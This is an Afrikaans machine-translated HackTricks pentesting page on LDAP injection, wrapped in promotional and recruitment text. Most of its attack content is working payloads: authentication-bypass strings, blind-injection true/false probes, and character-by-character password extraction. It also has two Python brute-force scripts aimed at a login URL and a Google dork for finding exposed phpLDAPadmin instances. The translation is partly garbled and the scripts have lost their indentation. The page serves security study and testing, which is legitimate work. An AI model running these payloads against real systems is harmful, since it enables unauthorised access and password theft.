hacktricks/pentesting-web/ldap-injection.md

9.4 KiB

LDAP Inspruiting

LDAP Inspruiting

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy belangstel in 'n hakloopbaan en die onhackbare hack - ons is aan die aanstel! (vloeiende Pools geskrewe en gesproke vereis).

{% embed url="https://www.stmcyber.com/careers" %}

LDAP Inspruiting

LDAP

As jy wil weet wat LDAP is, besoek die volgende bladsy:

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}

LDAP Inspruiting is 'n aanval wat gemik is op webtoepassings wat LDAP-verklarings vanaf gebruikersinvoer konstrueer. Dit gebeur wanneer die toepassing misluk om insette behoorlik te saniteer, wat aanvallers in staat stel om LDAP-verklarings te manipuleer deur 'n plaaslike proksi, wat moontlik kan lei tot ongemagtigde toegang of data-manipulasie.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE

Byvoorbeeld:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))

Jy kan toegang kry tot die databasis, en dit kan inligting van verskeie verskillende tipes bevat.

OpenLDAP: As 2 filters arriveer, voer dit slegs die eerste een uit.
ADAM of Microsoft LDS: Met 2 filters gooi hulle 'n fout uit.
SunOne Directory Server 5.0: Voer beide filters uit.

Dit is baie belangrik om die filter met die korrekte sintaksis te stuur, anders sal 'n fout uitgegooi word. Dit is beter om slegs 1 filter te stuur.

Die filter moet begin met: & of |
Voorbeeld: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Dan: (&(objectClass=*)(ObjectClass=*)) sal die eerste filter wees (die een wat uitgevoer word).

Aantekeningsverbygaan

LDAP ondersteun verskeie formate om die wagwoord te stoor: duidelik, md5, smd5, sh1, sha, crypt. Dus, dit kan wees dat ongeag wat jy binne die wagwoord invoer, dit gehash word.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Lyste

Blinde LDAP-inspuiting

Jy kan Vals of Waar reaksies afdwing om te kyk of enige data teruggegee word en 'n moontlike Blinde LDAP-inspuiting te bevestig:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Stort data

Jy kan oor die ASCII-letters, syfers en simbole iterasieer:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Skripte

Ontdek geldige LDAP-velde

LDAP-voorwerpe bevat standaard verskeie eienskappe wat gebruik kan word om inligting te stoor. Jy kan probeer om hulle almal met geweld te ontsluit om daardie inligting te onttrek. Jy kan 'n lys van standaard LDAP-eienskappe hier vind.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Spesiale Blinde LDAP-inspuiting (sonder "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

intitle:"phpLDAPadmin" inurl:cmd.php

Meer Lading

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

As jy belangstel in hackingsloopbaan en hack die onhackbare - ons is aan die aanstel! (vloeiende Pools geskrewe en gespreek benodig).

{% embed url="https://www.stmcyber.com/careers" %}

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: